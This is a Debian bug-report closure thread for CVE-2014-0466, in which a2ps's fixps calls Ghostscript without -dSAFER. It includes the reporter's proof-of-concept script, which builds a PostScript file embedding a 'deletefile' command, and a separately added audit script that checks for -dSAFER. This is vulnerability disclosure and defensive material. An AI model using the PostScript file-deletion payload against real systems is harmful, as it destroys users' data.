Your message dated Tue, 01 Apr 2014 21:17:06 +0000
with message-id <e1wv63o-0003fu...@franck.debian.org>
and subject line Bug#742902: fixed in a2ps 1:4.14-1.1+deb7u1
has caused the Debian Bug report #742902,
regarding a2ps: CVE-2014-0466: does not invoke gs with -dSAFER
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
742902: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742902
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: a2ps
Version: 1:4.14-1.2
Severity: grave
Tags: security
fixps does not invoke gs with -dSAFER. As a consequence, a malicious
PostScript file could delete files with the privileges of the invoking
user.
I have provided a test script that can be invoked as such:
./test-wrapper-fixps fixps
This was reported to the Debian Security Team, who assigned this
CVE-2014-0466. It was also reported to upstream, who has not provided
an update or issued a fixed version. This is being reported publicly as
over 45 days have elapsed and neither upstream nor the security team has
requested a delay or issued an advisory.
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages a2ps depends on:
ii file 1:5.17-1
ii libc6 2.18-4
ii libpaper1 1.1.24+nmu2
ii psutils 1.17.dfsg-1
Versions of packages a2ps recommends:
ii bzip2 1.0.6-5
ii cups-bsd [lpr] 1.7.1-10
ii wdiff 1.2.1-2
Versions of packages a2ps suggests:
pn emacsen-common <none>
ii ghostscript 9.05~dfsg-8+b1
ii groff 1.22.2-5
pn gv <none>
pn html2ps <none>
ii imagemagick 8:6.7.7.10+dfsg-1
pn t1-cyrillic <none>
ii texlive-binaries [texlive-base-bin] 2013.20130729.30972-2+b2
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
#!/bin/sh
# test-wrapper: test if a program is running gs without -dSAFER
#
# Usage: test-wrapper program --option --option2
TEMPDIR=`mktemp -d`
[ -n "$TEMPDIR" ] || exit 1
touch "$TEMPDIR/remove-me"
groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps"
Text
\X'ps: exec ($TEMPDIR/remove-me) deletefile'
More text.
EOM
"$@" "$TEMPDIR/exploit.ps" >/dev/null
if [ -e "$TEMPDIR/remove-me" ]
then
    printf "Program is not vulnerable.\n"
else
    printf "Program is VULNERABLE!\n"
fi
rm -r -- "$TEMPDIR"
--- End Message ---
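The fix for this report is to pass -dSAFER on the gs command line in fixps. As an added example (not from the bug report or the a2ps package), here is a small POSIX shell audit that flags gs invocations in a script which lack -dSAFER; the two sample scripts it checks are constructed for the demo and do not reproduce fixps's real command line.

```shell
#!/bin/sh
# Added example, not part of the bug report or of a2ps: audit a shell script
# for Ghostscript invocations that lack -dSAFER, which is the flag the fix
# for CVE-2014-0466 adds. Heuristic: a gs command line is any non-comment
# line (after joining backslash continuations) where "gs" starts a command.

# gs_safer_audit FILE: prints each gs invocation lacking -dSAFER.
# Returns 0 if none is found, 1 if at least one is, 2 if FILE is unreadable.
gs_safer_audit() {
    f=$1
    [ -r "$f" ] || return 2
    if sed -e ':a' -e '/\\$/N; s/\\\n//; ta' "$f" \
         | grep -v '^[[:space:]]*#' \
         | grep -E '(^|[|;&(]|[[:space:]])gs[[:space:]]' \
         | grep -v -e '-dSAFER'; then
        return 1    # the final grep printed an invocation without -dSAFER
    fi
    return 0
}

# gs_safer_demo: constructed sample scripts (not fixps's real command line),
# one without -dSAFER and one with it, each wrapped over two lines.
# Prints the audit results, expected "unsafe.sh=1 safe.sh=0".
gs_safer_demo() {
    d=$(mktemp -d) || return 2
    cat >"$d/unsafe.sh" <<'EOF'
#!/bin/sh
gs -q -dNOPAUSE -dBATCH \
   -sDEVICE=ps2write -sOutputFile=- "$1"
EOF
    cat >"$d/safe.sh" <<'EOF'
#!/bin/sh
gs -q -dNOPAUSE -dBATCH -dSAFER \
   -sDEVICE=ps2write -sOutputFile=- "$1"
EOF
    if gs_safer_audit "$d/unsafe.sh" >/dev/null; then u=0; else u=$?; fi
    if gs_safer_audit "$d/safe.sh" >/dev/null; then s=0; else s=$?; fi
    rm -r -- "$d"
    echo "unsafe.sh=$u safe.sh=$s"
}

gs_safer_demo
```

Run it with no arguments to see the demo, or call gs_safer_audit on a real wrapper script such as fixps to check its gs command line.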
--- Begin Message ---
Source: a2ps
Source-Version: 1:4.14-1.1+deb7u1
We believe that the bug you reported is fixed in the latest version of
a2ps, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 742...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <car...@debian.org> (supplier of updated a2ps package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
Format: 1.8
Date: Sun, 30 Mar 2014 12:43:56 +0200
Source: a2ps
Binary: a2ps
Architecture: source amd64
Version: 1:4.14-1.1+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: Masayuki Hatta (mhatta) <mha...@debian.org>
Changed-By: Salvatore Bonaccorso <car...@debian.org>
Description:
a2ps - GNU a2ps - 'Anything to PostScript' converter and pretty-printer
Closes: 737385 742902
Changes:
a2ps (1:4.14-1.1+deb7u1) wheezy-security; urgency=high
.
* Non-maintainer upload by the Security Team.
* Add 09_CVE-2001-1593.dpatch patch.
CVE-2011-1593: Fix insecure use of /tmp
Thanks to Jakub Wilk <jw...@debian.org> (Closes: #737385)
* Add 10_CVE-2014-0466.dpatch patch.
CVE-2014-0466: fixps does not invoke gs with -dSAFER. A malicious
PostScript file could delete files with the privileges of the invoking
user.
Thanks to brian m. carlson <sand...@crustytoothpaste.net> (Closes: #742902)
--- End Message ---